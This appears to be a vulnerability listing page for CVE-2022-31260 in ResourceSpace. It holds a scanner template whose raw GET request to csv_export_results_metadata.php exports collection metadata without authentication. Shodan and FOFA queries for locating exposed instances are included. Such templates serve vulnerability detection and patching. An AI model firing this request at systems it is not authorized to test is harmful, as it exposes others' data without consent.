CVE-2022-31260: ResourceSpace - Metadata Export

日期: 2025-08-01 | 影响软件: ResourceSpace | POC: 已公开

漏洞描述

In Montala ResourceSpace through 9.8 before r19636, csv_export_results_metadata.php allows attackers to export collection metadata via a non-NULL k value.

PoC代码[已公开]

id: CVE-2022-31260

info:
  name: ResourceSpace - Metadata Export
  author: ritikchaddha
  severity: medium
  description: |
    In Montala ResourceSpace through 9.8 before r19636, csv_export_results_metadata.php allows attackers to export collection metadata via a non-NULL k value.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive metadata.
  remediation: |
    Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2022-31260.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2022-31260.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31260
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-31260
    cwe-id: CWE-306
    epss-score: 0.13904
    epss-percentile: 0.94093
    cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: montala
    product: resourcespace
    shodan-query: title:"ResourceSpace"
    fofa-query: title="ResourceSpace"
  tags: cve,cve2022,resourcespace,misconfig

http:
  - raw:
      - |
        GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "CSV-Export -", "pagename=\"csv_export_results_metadata")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402205cf47fa6a7831f65db64dcbb2d3efd3292f0ea9bd0972d67d364e7792a5827ea022007dbfb19f3190e5481427f6dfd282e2796962a588506138659d4f34dbfcaccdd:922c64590222798bb761d5b6d8e72950

相关漏洞推荐